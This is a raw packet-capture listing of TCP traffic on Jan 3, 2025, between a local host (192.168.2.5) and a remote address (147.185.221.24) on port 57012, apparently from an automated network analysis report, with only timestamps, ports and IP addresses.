                                                          Jan 3, 2025 22:21:14.652245998 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652256012 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652264118 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652271986 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652313948 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652322054 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652455091 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652462959 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652471066 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652478933 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652487040 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652493954 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652503014 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652517080 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652532101 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652542114 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652576923 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652585030 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652628899 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652636051 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652673960 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652682066 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652707100 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652714968 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.652724981 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.724993944 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:14.729866028 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.834181070 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:14.839071989 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:14.943782091 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:14.958688974 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.056047916 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.060973883 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.112559080 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.162175894 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.164189100 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.169008970 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.198685884 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.203527927 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203560114 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203615904 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203624010 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203682899 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203690052 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203731060 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203738928 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203795910 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203803062 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203850031 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203856945 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203900099 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203907013 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203958988 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.203965902 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204020023 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204026937 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204052925 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204060078 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204179049 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204185963 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204193115 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204200029 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.204210043 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.271708965 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.276468039 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.382409096 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.387217045 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.491321087 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.496120930 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.569354057 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.599847078 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.604631901 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.680227041 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.685209036 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685241938 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685369015 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685378075 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685424089 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685432911 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685498953 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685506105 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685534954 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685560942 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685612917 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685620070 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685667992 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685676098 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685725927 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685734034 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685756922 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685764074 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685837984 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685849905 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685890913 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685899973 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685936928 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685945034 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685973883 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.685981989 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.686027050 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.709199905 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.713977098 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.818562031 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.823560953 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:15.927897930 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:15.932696104 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.037441969 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.042254925 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.146716118 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.151540995 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.198517084 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.240328074 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.240681887 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.245547056 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245558023 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245594025 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245601892 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245640993 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245726109 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245897055 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245904922 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245913029 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.245944977 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.258991003 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.264003992 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.365550995 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.370434999 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.474940062 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.479756117 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.584134102 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.588937998 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.695233107 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.700125933 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.711708069 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.755950928 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.757313967 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.762274981 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.762376070 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.762475014 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.762495041 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.762543917 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.762672901 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.762698889 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.762729883 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.802963018 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.847918987 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:16.964526892 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:16.969403982 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.118865013 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.122169971 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.123728037 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.163007021 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.404915094 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.409775972 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.409810066 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.413570881 CET4994157012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.414712906 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414722919 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414756060 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414763927 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414808989 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414855957 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414901972 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414949894 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.414959908 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415035009 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415286064 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415302992 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415405035 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415414095 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415458918 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415510893 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415618896 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415627003 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415666103 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.415713072 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.418361902 CET5701249941147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.506326914 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.511177063 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.615463018 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.620320082 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.725034952 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.729983091 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.754451036 CET5701249941147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.756392956 CET4994157012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.761259079 CET5701249941147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.773788929 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.818466902 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.834350109 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.836838961 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.839170933 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.841772079 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.841876030 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.841922998 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842051983 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842061043 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842070103 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842098951 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842154980 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842163086 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842232943 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842288017 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.842298985 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:17.943721056 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:17.957010984 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.053060055 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.058039904 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.162512064 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.167578936 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.202411890 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.255965948 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.260333061 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.265392065 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.265405893 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.265450001 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.265552044 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.265639067 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.308007002 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.308123112 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.313005924 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.381345034 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.386272907 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.490546942 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.495444059 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.599958897 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.604840040 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.624094963 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.665601015 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.670855045 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.670972109 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.670984983 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.670998096 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671020031 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671139002 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671150923 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671163082 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671211958 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671411991 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671504974 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.671529055 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.711946011 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.712102890 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.716989040 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.818734884 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.823659897 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:18.928055048 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:18.932882071 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.031876087 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.039280891 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.044303894 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.087827921 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.092881918 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.092952013 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.092999935 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093019962 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093034029 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093120098 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093242884 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093254089 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093266010 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093278885 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.093302011 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.150162935 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.155036926 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.256122112 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.261053085 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.365473032 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.370347023 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.476317883 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.481137991 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.486231089 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.537210941 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.558233023 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.563129902 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563158035 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563191891 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563214064 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563270092 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563349962 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563370943 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563383102 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563431978 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563453913 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563538074 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.563549995 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.603895903 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.603984118 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.608817101 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.710330009 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.715172052 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:19.912918091 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:19.917756081 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.031219006 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.084110022 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.121012926 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.125868082 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.129050016 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.133907080 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.133966923 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.134032011 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.134133101 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.134145021 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.134160042 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.134219885 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.134407997 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.224916935 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.229756117 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.334431887 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.339330912 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.445079088 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.449888945 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.553100109 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.557985067 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.662347078 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.667124987 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.667627096 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.709063053 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.713855982 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.718807936 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.718952894 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.718961954 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.719005108 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.719046116 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.719089985 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.719161034 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.719170094 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.719203949 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.771857023 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.819953918 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.881105900 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.885889053 CET5701249983147.185.221.24192.168.2.5
                                                          Jan 3, 2025 22:21:20.990386009 CET4998357012192.168.2.5147.185.221.24
                                                          Jan 3, 2025 22:21:20.995224953 CET5701249983147.185.221.24192.168.2.5
